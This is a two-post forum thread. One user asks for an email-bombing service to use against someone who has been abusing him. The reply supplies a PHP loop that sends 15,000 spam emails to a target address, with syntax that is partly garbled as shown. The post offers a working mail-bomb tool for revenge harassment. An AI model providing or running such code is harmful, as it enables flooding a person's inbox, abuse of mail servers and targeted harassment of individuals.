Results 1 to 2 of 2

Thread: Email bombardment

  1. #1

    ZeroPaid Regular

    Join Date
    Aug 2004
    Posts
    73

    Email bombardment

    A while a go i found a link offering a email bombardment service sending one mail every 3 seconds ! I have a problem with a guy emailing me and giving abuse i wanna set him up on this but i cant find the link does anyone know of a similar link

  2. #2

    ZeroPaid Regular

    Join Date
    Feb 2004
    Posts
    1,666
    I know how to send an email even faster than that... and I'm not going to sell it. In fact, here's some code that will work on any webserver with sendmail and PHP installed:
    PHP Code:
    <?php
    for($x=0;$x<15000;$x++) {
          
    mail("[email protected]""Whoops j00 got pwned""This is some spam. Eat it!""FROM [email][email protected][/email]"); }
                                          }
    I'm not sure about the FROM part, I use similar code for a mail form on my site, but it just leaves the default values of [email protected]lmachine...

    Jussssst FYI

Similar Threads

  1. Replies: 16
    Last Post: June 7th, 2005, 08:05 PM
  2. Mozilla Thunderbird 1.0 Email Client Has Landed
    By g-smooth2k in forum Windows
    Replies: 3
    Last Post: December 8th, 2004, 02:11 AM
  3. P-P-P-Powerbook
    By WE_DELIVER in forum The Lounge
    Replies: 11
    Last Post: October 17th, 2004, 04:15 PM
  4. email bounce deception
    By MoonMan in forum General Computing
    Replies: 10
    Last Post: June 25th, 2004, 10:56 AM
  5. Email Gigabyte, Terabyte war
    By g-smooth2k in forum The Lounge
    Replies: 9
    Last Post: June 21st, 2004, 02:47 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •